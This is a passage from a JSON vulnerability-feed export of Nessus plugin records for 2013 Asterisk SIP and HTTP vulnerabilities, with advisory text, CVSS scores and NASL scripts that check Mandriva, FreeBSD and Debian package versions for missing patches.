(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif 
(isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-addons-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-devel-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-firmware-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-alsa-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-calendar-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-cel-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-corosync-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-curl-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-dahdi-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-fax-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-festival-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ices-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jabber-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jack-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ldap-11.2.2-1.mbs1\")) flag++;\nif 
(rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-lua-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-minivm-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mobile-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mp3-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mysql-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ooh323-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-osp-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-oss-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pgsql-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pktccops-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-portaudio-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-radius-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-saycountpl-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-skinny-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-snmp-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-speex-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-sqlite-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", 
reference:\"asterisk-plugins-tds-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-unistim-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-imap-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-plain-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64asteriskssl1-11.2.2-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:10", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by the following vulnerabilities :\n\n - A buffer overflow exists in the SIP SDP headers and h264 video handling. NOTE: Only affects versions earlier than 11.2.2 (CVE-2013-2685)\n\n - A denial of service exists in the HTTP POST requests with very large 'Content-Length' header values. (CVE-2013-2686)\n\n - An information disclosure exists in the INVITE, SUBSCRIBE and REGISTER transactions and improper settings for the configuration options. 
(CVE-2013-2264)", "cvss3": {}, "published": "2013-04-10T00:00:00", "type": "nessus", "title": "Asterisk Multiple Vulnerabilities (AST-2013-001 / AST-2013-002 / AST-2013-003)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*"], "id": "6750.PRM", "href": "https://www.tenable.com/plugins/nnm/6750", "sourceData": "Binary data 6750.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:44", "description": "Asterisk project reports :\n\nBuffer Overflow Exploit Through SIP SDP Header\n\nUsername disclosure in SIP channel driver\n\nDenial of Service in HTTP server", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "nessus", "title": "FreeBSD : asterisk -- multiple vulnerabilities (daf0a339-9850-11e2-879e-d43d7e0c7c02)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686"], "modified": "2021-01-06T00:00:00", "cpe": 
["p-cpe:/a:freebsd:freebsd:asterisk10", "p-cpe:/a:freebsd:freebsd:asterisk11", "p-cpe:/a:freebsd:freebsd:asterisk18", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_DAF0A339985011E2879ED43D7E0C7C02.NASL", "href": "https://www.tenable.com/plugins/nessus/65852", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65852);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (daf0a339-9850-11e2-879e-d43d7e0c7c02)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Asterisk project reports :\n\nBuffer Overflow Exploit Through SIP SDP Header\n\nUsername disclosure in SIP channel driver\n\nDenial of Service in HTTP server\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-003.html\"\n );\n # https://www.asterisk.org/security\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.asterisk.org/downloads/security-advisories\"\n );\n # 
https://vuxml.freebsd.org/freebsd/daf0a339-9850-11e2-879e-d43d7e0c7c02.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75374b7e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk18\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk11>11.*<11.2.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk10>10.*<10.12.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk18>1.8.*<1.8.20.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:58:35", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in the SIP processing code of Asterisk - an open source PBX and telephony toolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Debian DSA-2749-1 : asterisk - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], 
"modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:asterisk", "cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2749.NASL", "href": "https://www.tenable.com/plugins/nessus/69542", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2749. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69542);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"DSA\", value:\"2749\");\n\n script_name(english:\"Debian DSA-2749-1 : asterisk - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2749\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the asterisk packages.\n\nFor the oldstable distribution (squeeze), these problems have been\nfixed in version 1:1.6.2.9-2+squeeze11.\n\nFor the 
stable distribution (wheezy), these problems have been fixed\nin version 1.8.13.1~dfsg-3+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"asterisk\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-config\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dbg\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dev\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-doc\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-h323\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-sounds-main\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-config\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dahdi\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dbg\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dev\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-doc\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mobile\", 
reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-modules\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mp3\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mysql\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-ooh323\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-imapstorage\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-odbcstorage\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:58:40", "description": "Updated asterisk packages fix security vulnerabilities :\n\nA remotely exploitable crash vulnerability exists in the SIP channel driver if an ACK with SDP is received after the channel has been terminated. The handling code incorrectly assumes that the channel will always be present (CVE-2013-5641).\n\nA remotely exploitable crash vulnerability exists in the SIP channel driver if an invalid SDP is sent in a SIP request that defines media descriptions before connection information. 
The handling code incorrectly attempts to reference the socket address information even though that information has not yet been set (CVE-2013-5642).", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : asterisk (MDVSA-2013:223)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:asterisk", "p-cpe:/a:mandriva:linux:asterisk-addons", "p-cpe:/a:mandriva:linux:asterisk-devel", "p-cpe:/a:mandriva:linux:asterisk-firmware", "p-cpe:/a:mandriva:linux:asterisk-gui", "p-cpe:/a:mandriva:linux:asterisk-plugins-alsa", "p-cpe:/a:mandriva:linux:asterisk-plugins-calendar", "p-cpe:/a:mandriva:linux:asterisk-plugins-cel", "p-cpe:/a:mandriva:linux:asterisk-plugins-corosync", "p-cpe:/a:mandriva:linux:asterisk-plugins-curl", "p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi", "p-cpe:/a:mandriva:linux:asterisk-plugins-fax", "p-cpe:/a:mandriva:linux:asterisk-plugins-festival", "p-cpe:/a:mandriva:linux:asterisk-plugins-ices", "p-cpe:/a:mandriva:linux:asterisk-plugins-jabber", "p-cpe:/a:mandriva:linux:asterisk-plugins-jack", "p-cpe:/a:mandriva:linux:asterisk-plugins-ldap", "p-cpe:/a:mandriva:linux:asterisk-plugins-lua", "p-cpe:/a:mandriva:linux:asterisk-plugins-minivm", "p-cpe:/a:mandriva:linux:asterisk-plugins-mobile", "p-cpe:/a:mandriva:linux:asterisk-plugins-mp3", "p-cpe:/a:mandriva:linux:asterisk-plugins-mysql", "p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323", 
"p-cpe:/a:mandriva:linux:asterisk-plugins-osp", "p-cpe:/a:mandriva:linux:asterisk-plugins-oss", "p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql", "p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops", "p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio", "p-cpe:/a:mandriva:linux:asterisk-plugins-radius", "p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl", "p-cpe:/a:mandriva:linux:asterisk-plugins-skinny", "p-cpe:/a:mandriva:linux:asterisk-plugins-snmp", "p-cpe:/a:mandriva:linux:asterisk-plugins-speex", "p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite", "p-cpe:/a:mandriva:linux:asterisk-plugins-tds", "p-cpe:/a:mandriva:linux:asterisk-plugins-unistim", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain", "p-cpe:/a:mandriva:linux:lib64asteriskssl1", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2013-223.NASL", "href": "https://www.tenable.com/plugins/nessus/69540", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:223. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69540);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"MDVSA\", value:\"2013:223\");\n\n script_name(english:\"Mandriva Linux Security Advisory : asterisk (MDVSA-2013:223)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated asterisk packages fix security vulnerabilities :\n\nA remotely exploitable crash vulnerability exists in the SIP channel\ndriver if an ACK with SDP is received after the channel has been\nterminated. The handling code incorrectly assumes that the channel\nwill always be present (CVE-2013-5641).\n\nA remotely exploitable crash vulnerability exists in the SIP channel\ndriver if an invalid SDP is sent in a SIP request that defines media\ndescriptions before connection information. 
The handling code\nincorrectly attempts to reference the socket address information even\nthough that information has not yet been set (CVE-2013-5642).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-cel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-corosync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi\");\n 